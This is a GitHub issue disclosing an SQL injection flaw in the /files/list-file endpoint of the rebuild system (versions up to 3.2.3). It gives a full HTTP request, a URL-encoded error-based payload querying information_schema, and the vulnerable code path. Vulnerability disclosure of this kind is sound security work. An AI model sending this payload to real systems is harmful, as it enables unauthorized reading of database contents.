Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection vulnerability exists in the /files/list-file interface of the rebuild system #598

Closed
Mechoy opened this issue Mar 19, 2023 · 1 comment

Comments

@Mechoy
Copy link

Mechoy commented Mar 19, 2023

版本 / Version

<=3.2.3

什么问题 / What's the problem

在rebuild系统的/files/list-file接口中存在SQL注入漏洞
There is a SQL injection vulnerability in the /files/list-file interface of the rebuild system.

如何复现此问题 / How to reproduce this problem

功能点 / Function points

sql3_3

请求信息 / Request message:

GET /files/list-file?entry=1&sort=&q=1&pageNo=1&pageSize=40&_=1679238611579 HTTP/1.1
Host: 192.168.0.102:18080
X-AuthToken: 
Accept: */*
X-CsrfToken: 
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Referer: http://192.168.0.102:18080/files/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rb.lastFilesPath=attachment; _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679238611.9.1.1679238613.0.0.0
Connection: close

攻击载荷 / payload:

%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)+and%201%20=%20?%20--+

漏洞复现 / Vulnerability recurrence

sql3_4

系统环境 (操作系统/MySQL版本/浏览器等) / System environment (OS/MySQL/Browser etc)

Mysql 5.7.26
Windows
JDK1.8.0_341
Chrome

说明 / Suggested description

sql injection vulnerability exists in rebuild <=3.2.3
在rebuild系统小于3.2.3版本中存在SQL注入漏洞
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
未能合法检查参数从而导致sql注入漏洞.

漏洞类型 / Vulnerability Type

SQLi

产品供应商 / Vendor of Product

https://github.com/getrebuild/rebuild

受影响的产品代码库 / Affected Product Code Base

<=3.2.3

受影响组件 / Affected Component

/files/list-file

攻击方式 / Attack Type

Remote

漏洞成因 / Cause of vulnerability

In the com.rebuild.web.files.FileListController#listFile() method, obtain the user's input and splice it into SqlWhere
com.rebuild.web.files.FileListController#listFile()方法中,获取用户的输入,并拼接至SqlWhere中
sql3_1
The StringEscapeUtils.escapeSql method is used here to process user input, which poses a risk of being bypassed.
此处使用StringEscapeUtils.escapeSql方法对用户输入进行处理,此种方法存在绕过的风险。
Then insert SqlWhere into the final query statement and bring it into the query.
随后将SqlWhere插入到最终的查询语句中,并带入到查询中。
sql3_2
An attacker can implement a SQL injection vulnerability when passing in malicious SQL statements.
当攻击者传入恶意的sql语句时,即可实现SQL注入漏洞。
The end,thanks!

@getrebuild
Copy link
Owner

#594

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants